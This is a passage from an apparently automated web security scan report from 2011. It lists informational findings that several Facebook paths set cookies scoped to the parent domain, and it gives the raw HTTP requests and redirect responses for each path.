Cookie: W=1296674535; made_write_conn=1296674535; __utmz=87286159.1296663493.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); datr=8CJHTYhjyotVYfKpZ5B35lnF; __utma=87286159.380325508.1296663493.1296663493.1296663493.1; lsd=ErPUD; reg_fb_ref=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; __utmc=87286159; wd=1036x1012; reg_fb_gate=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS; __utmb=87286159.1.10.1296663493;

Response

11.326. http://www.facebook.com/mobile previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/mobile

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

__utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
made_write_conn=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
W=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /mobile HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: W=1296674535; made_write_conn=1296674535; __utmz=87286159.1296663493.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); datr=8CJHTYhjyotVYfKpZ5B35lnF; __utma=87286159.380325508.1296663493.1296663493.1296663493.1; lsd=ErPUD; reg_fb_ref=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; __utmc=87286159; wd=1036x1012; reg_fb_gate=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS; __utmb=87286159.1.10.1296663493;

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/mobile/
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: made_write_conn=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: W=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Thu, 03 Feb 2011 04:09:23 GMT
Content-Length: 0

11.327. http://www.facebook.com/omniture previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/omniture

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

__utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
made_write_conn=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
W=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /omniture HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: W=1296674535; made_write_conn=1296674535; __utmz=87286159.1296663493.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); datr=8CJHTYhjyotVYfKpZ5B35lnF; __utma=87286159.380325508.1296663493.1296663493.1296663493.1; lsd=ErPUD; reg_fb_ref=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; __utmc=87286159; wd=1036x1012; reg_fb_gate=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS; __utmb=87286159.1.10.1296663493;

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/Omniture
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: made_write_conn=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: W=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Thu, 03 Feb 2011 04:08:17 GMT
Content-Length: 0

11.328. http://www.facebook.com/orbitz previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/orbitz

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

__utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
made_write_conn=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
W=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /orbitz HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: W=1296674535; made_write_conn=1296674535; __utmz=87286159.1296663493.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); datr=8CJHTYhjyotVYfKpZ5B35lnF; __utma=87286159.380325508.1296663493.1296663493.1296663493.1; lsd=ErPUD; reg_fb_ref=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; __utmc=87286159; wd=1036x1012; reg_fb_gate=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS; __utmb=87286159.1.10.1296663493;

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/Orbitz
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: made_write_conn=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: W=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Thu, 03 Feb 2011 04:07:24 GMT
Content-Length: 0

11.329. http://www.facebook.com/pages/blekko/316217594002 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/blekko/316217594002

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

__utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
made_write_conn=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
W=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pages/blekko/316217594002 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: W=1296674535; made_write_conn=1296674535; __utmz=87286159.1296663493.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); datr=8CJHTYhjyotVYfKpZ5B35lnF; __utma=87286159.380325508.1296663493.1296663493.1296663493.1; lsd=ErPUD; reg_fb_ref=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; __utmc=87286159; wd=1036x1012; reg_fb_gate=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS; __utmb=87286159.1.10.1296663493;

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/blekko
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: made_write_conn=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: W=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Thu, 03 Feb 2011 04:17:56 GMT
Content-Length: 0

11.330. http://www.facebook.com/platform previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/platform

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

__utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
made_write_conn=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
W=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /platform HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: W=1296674535; made_write_conn=1296674535; __utmz=87286159.1296663493.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); datr=8CJHTYhjyotVYfKpZ5B35lnF; __utma=87286159.380325508.1296663493.1296663493.1296663493.1; lsd=ErPUD; reg_fb_ref=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; __utmc=87286159; wd=1036x1012; reg_fb_gate=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS; __utmb=87286159.1.10.1296663493;

Response

11.331. http://www.facebook.com/policy.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/policy.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

__utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
made_write_conn=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
W=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /policy.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: W=1296674535; made_write_conn=1296674535; __utmz=87286159.1296663493.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); datr=8CJHTYhjyotVYfKpZ5B35lnF; __utma=87286159.380325508.1296663493.1296663493.1296663493.1; lsd=ErPUD; reg_fb_ref=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; __utmc=87286159; wd=1036x1012; reg_fb_gate=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS; __utmb=87286159.1.10.1296663493;

Response

11.332. http://www.facebook.com/privacy/explanation.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/privacy/explanation.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

__utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
made_write_conn=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fprivacy%2Fexplanation.php; path=/; domain=.facebook.com
W=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /privacy/explanation.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: W=1296674535; made_write_conn=1296674535; __utmz=87286159.1296663493.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); datr=8CJHTYhjyotVYfKpZ5B35lnF; __utma=87286159.380325508.1296663493.1296663493.1296663493.1; lsd=ErPUD; reg_fb_ref=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; __utmc=87286159; wd=1036x1012; reg_fb_gate=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS; __utmb=87286159.1.10.1296663493;

Response

11.333. http://www.facebook.com/r.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/r.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

__utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
made_write_conn=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
W=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /r.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: W=1296674535; made_write_conn=1296674535; __utmz=87286159.1296663493.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); datr=8CJHTYhjyotVYfKpZ5B35lnF; __utma=87286159.380325508.1296663493.1296663493.1296663493.1; lsd=ErPUD; reg_fb_ref=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; __utmc=87286159; wd=1036x1012; reg_fb_gate=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS; __utmb=87286159.1.10.1296663493;

Response

11.334. http://www.facebook.com/recover.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/recover.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

__utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
made_write_conn=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
W=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /recover.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: W=1296674535; made_write_conn=1296674535; __utmz=87286159.1296663493.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); datr=8CJHTYhjyotVYfKpZ5B35lnF; __utma=87286159.380325508.1296663493.1296663493.1296663493.1; lsd=ErPUD; reg_fb_ref=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; __utmc=87286159; wd=1036x1012; reg_fb_gate=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS; __utmb=87286159.1.10.1296663493;

Response

HTTP/1.1 302 Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: https://www.facebook.com/recover.php
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: made_write_conn=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: W=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Thu, 03 Feb 2011 04:08:38 GMT
Content-Length: 0

11.335. http://www.facebook.com/terms.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/terms.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

__utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
made_write_conn=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
W=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /terms.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: W=1296674535; made_write_conn=1296674535; __utmz=87286159.1296663493.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); datr=8CJHTYhjyotVYfKpZ5B35lnF; __utma=87286159.380325508.1296663493.1296663493.1296663493.1; lsd=ErPUD; reg_fb_ref=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; __utmc=87286159; wd=1036x1012; reg_fb_gate=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS; __utmb=87286159.1.10.1296663493;

Response

11.336. https://www.facebook.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.facebook.com
Path:	/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

__utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
made_write_conn=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
W=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.337. https://www.facebook.com/2008/fbml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.facebook.com
Path:	/2008/fbml

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

__utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
made_write_conn=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
W=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.338. https://www.facebook.com/login.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.facebook.com
Path:	/login.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

__utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
